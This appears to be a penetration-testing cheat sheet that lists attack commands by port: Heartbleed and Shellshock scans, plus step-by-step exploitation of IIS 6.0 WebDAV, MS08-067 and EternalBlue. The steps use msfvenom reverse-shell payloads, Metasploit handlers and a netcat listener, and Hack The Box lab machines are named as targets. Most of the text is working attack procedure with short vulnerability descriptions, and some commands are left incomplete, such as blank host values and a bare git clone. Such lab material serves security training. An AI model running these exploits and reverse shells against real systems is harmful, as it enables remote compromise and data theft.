HTTPS (443/tcp)


The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. This weakness allows stealing the information protected, under normal conditions, by the SSL/TLS encryption used to secure the Internet. SSL/TLS provides communication security and privacy over the Internet for applications such as web, email, instant messaging (IM) and some virtual private networks (VPNs).The Heartbleed bug allows anyone on the Internet to read the memory of the systems protected by the vulnerable versions of the OpenSSL software. This compromises the secret keys used to identify the service providers and to encrypt the traffic, the names and passwords of the users and the actual content. This allows attackers to eavesdrop on communications, steal data directly from the services and users and to impersonate services and users.


NSE Script

nmap --script vuln -oA vulnscan -p443


sslyze --heartbleed



Web (80/tcp)



root@kali:~# locate -r '\.nse$' | grep -i shellshock

nmap -p 80 --script http-shellshock --script-args uri=/cgi-bin/,cmd=ls


Microsoft IIS 6.0 (CVE:2017-7269)

Buffer overflow in the ScStoragePathFromUrl function in the WebDAV service in Internet Information Services (IIS) 6.0 in Microsoft Windows Server 2003 R2 allows remote attackers to execute arbitrary code via a long header beginning with "If: <http://" in a PROPFIND request, as exploited in the wild in July or August 2016.

msfvenom -p windows/meterpreter/reverse_tcp -f raw -v sc -e x86/alpha_mixed LHOST= LPORT=4444 >shellcode

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost
msf exploit(handler) > set lport 4444
msf exploit(handler) > exploit

python shellcode

You can test it on Hack the box "Grandpa": - OS Name: Microsoft(R) Windows(R) Server 2003, Standard Edition - OS Version: 5.2.3790 Service Pack 2 Build 3790 - Hotfix(s): N/A

SMB (139,445)



This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service. This module is capable of bypassing NX on some operating systems and service packs. The correct target must be used to prevent the Server Service (along with a dozen others in the same process) from crashing. Windows XP targets seem to handle multiple successful exploitation events, but 2003 targets will often crash or hang on subsequent attempts. This is just the first version of this module, full support for NX bypass on 2003, along with other platforms, is still in development.

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
msf exploit(windows/smb/ms08_067_netapi) > set rhost
msf exploit(windows/smb/ms08_067_netapi) > set lhost
msf exploit(windows/smb/ms08_067_netapi) > run

You can test it on Hack the box "Legacy": - OS Name: Microsoft Windows XP Professional - OS Version: 5.1.2600 Service Pack 3 Build 2600 - Hotfix(s): Q147222



git clone
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4444 EXITFUNC=thread -f exe -a x86 --platform windows -o shell.exe
nc -nlvp 4444
python ../shell.exe

You can test it on Hack the box "Legacy": - OS Name: Microsoft Windows XP Professional - OS Version: 5.1.2600 Service Pack 3 Build 2600 - Hotfix(s): Q147222


This module is a port of the Equation Group ETERNALBLUE exploit, part of the FuzzBunch toolkit released by Shadow Brokers. There is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size is calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error where a DWORD is subtracted into a WORD. The kernel pool is groomed so that overflow is well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later completed in srvnet!SrvNetWskReceiveComplete. This exploit, like the original may not trigger 100% of the time, and should be run continuously until triggered. It seems like the pool will get hot streaks and need a cool down period before the shells rain in again. The module will attempt to use Anonymous login, by default, to authenticate to perform the exploit. If the user supplies credentials in the SMBUser, SMBPass, and SMBDomain options it will use those instead. On some systems, this module may cause system instability and crashes, such as a BSOD or a reboot. This may be more likely with some payloads.

msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(windows/smb/ms17_010_eternalblue) > set lhost tun0
msf exploit(windows/smb/ms17_010_eternalblue) > set rhost
msf exploit(windows/smb/ms17_010_eternalblue) > exploit

You can test it on Hack the box "Blue": - OS Name: Microsoft Windows 7 Professional - OS Version: 6.1.7601 Service Pack 1 Build 7601 - Hotfix(s): 200 Hotfix(s) Installed. [01]: KB2849697 [02]: KB2849696 [03]: KB2841134

Last updated